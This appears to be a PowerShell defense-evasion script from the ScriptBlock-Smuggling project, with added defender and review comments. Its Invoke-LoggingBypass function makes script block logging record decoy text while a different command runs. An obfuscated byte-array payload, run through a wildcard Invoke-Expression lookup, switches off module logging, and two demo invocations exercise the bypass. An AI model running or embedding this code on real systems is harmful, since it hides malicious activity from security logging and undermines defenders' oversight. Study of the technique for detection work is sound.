# https://github.com/BC-SECURITY/ScriptBlock-Smuggling
# Runs $Command while presenting $Dummy as the script text. The ScriptBlockAst built below
# takes its Extent (the source text and positions a logger sees) from the decoy and its
# EndBlock (the statements that actually execute) from the real command.
#   $Command - PowerShell source that actually runs.
#   $Dummy   - PowerShell source whose text is attached as the extent of the executed block.
# Output: whatever $Command's statements emit to the pipeline. No argument validation.
# Defender note: per the demo comments at the bottom of this file, script block logging
# (event 4104) records $Dummy, so logged script text from a host running this cannot be
# taken at face value; corroborate 4104 content with other telemetry.
Function Invoke-LoggingBypass(){
param([String]$Command, [String]$Dummy)
# Decoy AST: only its Extent is reused below.
$SpoofedAST = [scriptblock]:: Create($Dummy).Ast
# Real AST: its EndBlock holds the statements that will run.
$ExecutedAST = [scriptblock]::Create($Command).Ast
# Presumably the (extent, paramBlock, beginBlock, processBlock, endBlock, dynamicParamBlock)
# overload; only the extent and endBlock are supplied, the other blocks are $null.
# EndBlock.Copy() is presumably needed because the node is already attached to
# $ExecutedAST and cannot be reparented as-is - TODO confirm.
$AST = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAST.Extent, $null, $null, $null, $ExecutedAST.EndBlock.Copy(), $null)
$ScriptBlock = $AST.GetScriptBlock()
# Invoked with the call operator; output goes straight to the caller's pipeline.
& $ScriptBlock
}
# https://bc-security.org/powershell-logging-obfuscation-and-some-newish-bypasses-part-1/
# The byte array $z below is the ASCII encoding of: "$module = Get-Module Microsoft.PowerShell.Utility;$module.LogPipelineExecutionDetails = $false;$module=Get-Module Microsoft.PowerShell.Management;$module.LogPipelineExecutionDetails = $false;(Get-PSSnapin).LogPipelineExecutionDetails = $false"
# Could simplify further with (Get-Module <name>).LogPipelineExecutionDetails = $false
try{
# Only act when module logging (LogPipelineExecutionDetails) is currently on for any
# snap-in or for the two core modules. NOTE(review): Get-PSSnapin exists only in Windows
# PowerShell; on PowerShell 7+ this line presumably throws and the empty catch below
# hides it - confirm before relying on the block either way.
if(((Get-PSSnapin).LogPipelineExecutionDetails)-or((Get-Module Microsoft.PowerShell.Utility).LogPipelineExecutionDetails)-or(Get-Module Microsoft.PowerShell.Management).LogPipelineExecutionDetails){
# ASCII bytes of the command quoted in the comment above this block: it sets
# LogPipelineExecutionDetails = $false on the Utility and Management module objects and on
# the snap-ins. Only in-session module objects are modified; nothing on disk or in the
# registry is changed here.
[byte[]]$z=(0x24,0x6d,0x6f,0x64,0x75,0x6c,0x65,0x20,0x3d,0x20,0x47,0x65,0x74,0x2d,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2e,0x50,0x6f,0x77,0x65,0x72,0x53,0x68,0x65,0x6c,0x6c,0x2e,0x55,0x74,0x69,0x6c,0x69,0x74,0x79,0x3b,0x24,0x6d,0x6f,0x64,0x75,0x6c,0x65,0x2e,0x4c,0x6f,0x67,0x50,0x69,0x70,0x65,0x6c,0x69,0x6e,0x65,0x45,0x78,0x65,0x63,0x75,0x74,0x69,0x6f,0x6e,0x44,0x65,0x74,0x61,0x69,0x6c,0x73,0x20,0x3d,0x20,0x24,0x66,0x61,0x6c,0x73,0x65,0x3b,0x24,0x6d,0x6f,0x64,0x75,0x6c,0x65,0x3d,0x47,0x65,0x74,0x2d,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2e,0x50,0x6f,0x77,0x65,0x72,0x53,0x68,0x65,0x6c,0x6c,0x2e,0x4d,0x61,0x6e,0x61,0x67,0x65,0x6d,0x65,0x6e,0x74,0x3b,0x24,0x6d,0x6f,0x64,0x75,0x6c,0x65,0x2e,0x4c,0x6f,0x67,0x50,0x69,0x70,0x65,0x6c,0x69,0x6e,0x65,0x45,0x78,0x65,0x63,0x75,0x74,0x69,0x6f,0x6e,0x44,0x65,0x74,0x61,0x69,0x6c,0x73,0x20,0x3d,0x20,0x24,0x66,0x61,0x6c,0x73,0x65,0x3b,0x28,0x47,0x65,0x74,0x2d,0x50,0x53,0x53,0x6e,0x61,0x70,0x69,0x6e,0x29,0x2e,0x4c,0x6f,0x67,0x50,0x69,0x70,0x65,0x6c,0x69,0x6e,0x65,0x45,0x78,0x65,0x63,0x75,0x74,0x69,0x6f,0x6e,0x44,0x65,0x74,0x61,0x69,0x6c,0x73,0x20,0x3d,0x20,0x24,0x66,0x61,0x6c,0x73,0x65)
# Resolves a command by wildcard (the pattern matches Invoke-Expression) and invokes it
# with the decoded string; [String]::new($z) relies on PowerShell widening byte[] to
# char[]. Defender note: wildcard Get-Command lookup combined with byte-array-to-string
# decoding is itself a recognisable obfuscation pattern that detection content can key on.
& ([String]::new(((gcm *v?k?-?x?re*).name)))([String]::new($z))
}
# Empty catch: any error in the block above is silently discarded and the script continues,
# so the caller cannot tell whether module logging was actually turned off.
}catch{}
# Demo 1: per the author's notes, the 4104 (script block logging) event shows the decoy
# text "Write-Host 'test'" and no 4103 (module logging) event is produced, while the
# real command prints 'Hello World'.
$helloDemo = @{
    Command = "Write-Host 'Hello World'"
    Dummy   = "Write-Host 'test'"
}
Invoke-LoggingBypass @helloDemo

# Demo 2: creates Detect.txt on the current user's Desktop and pipes the result to
# write-host. Per the author's notes the 4104 event shows "write-Host 'Detect Me!'" and a
# blank 4103 Out-Default event is produced; if the file already exists, the 4103 event
# carries the error text instead. $env:USERPROFILE is expanded here, in the outer
# double-quoted string, before the text reaches Invoke-LoggingBypass.
$detectDemo = @{
    Command = "New-Item -Name Detect.txt -ItemType File -Path '$env:USERPROFILE\Desktop' | write-host"
    Dummy   = "Write-Host 'Detect Me!'"
}
Invoke-LoggingBypass @detectDemo